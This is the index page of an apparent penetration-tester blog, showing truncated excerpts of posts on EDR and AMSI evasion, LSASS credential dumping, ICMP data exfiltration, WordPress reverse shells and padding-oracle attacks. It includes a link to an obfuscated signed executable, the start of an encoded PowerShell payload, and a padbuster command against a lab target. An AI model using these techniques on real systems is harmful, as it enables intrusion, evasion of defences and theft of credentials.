Home
A Pentesters Ramblings
Cancel

Evasion Tools

A list of tools to bypass EDR using a variety of evasion techniques. PwnPowerShell GH - Signed - https://github.com/sp00ks-git/obfuscated-Encrypted-2023/raw/gh-pages/pjutvtn.exe.Signed.exe M...

Wordlists

WORDLISTS Suggested Wordlists download links (HTTP) - working as of 14/10/2019 (maybe out of date now but some should still be working) rockyou - https://github.com/brannondorsey/naive-hashcat...

Encrypted SPN Scanning

Encrypted SPN Scanning and Cipher extraction whilst evading AntiVirus Usually SPN scanning involves using tools such as Rubeus. However as these are common and AV is looking for fingerprints of th...

AMSI

A M S I ${01001011100110010} = [Convert]::FromBase64String("TV"+"qQAAM"+"AAAAEAAAA//8A"+"ALgAAAAAAAAAQAA"+"AAAAAAAAAAAAAAAAAA"+"AAAAAAAAAAAAAAAAAA"+"AAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncm...

Win7 LPE

It is less common than it used to be to find Windows 7 Operating systems in place, have they are still found across domains. Sometimes forbespoke applciatiosn or services that can’t be ported onto ...

CLM Bypass

It is common during engagements to find that CLM (Constrained Language Mode) is configured on PowerShell as a SafeGuard or control against malicous activity. This is a common misconception as there...

ICMP Tunneling

I recently had a situation during an engagement where i needed to demonstrate that data could be extracted from the organisation. I wanted to exfil data without going over the internet for security...

LSASS Encrypted Dump

There are many, many ways to dump the LSASS process in order to gather credentials and other sensitive information from systems. Two ways I dump LSASS can be seen below. The first way is to invok...

Reverse Shell in Wordpress with WPForce

Reverse Shell in Wordpress with WPForce and Yertle Imagine the scenario where you are presented with a WordPress site during a pentest and want to get in. Standard ‘author?’ requests don’t give y...

Oracle Padding

STEP 1 padbuster http://docker.hackthebox.eu:37742 zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D --cookies "PHPSESSID=7d5guetet0tj3o1kn8lrd77da0;iknowmag1k=zjtTgJyHOn9YxWLIJu%2BnoD...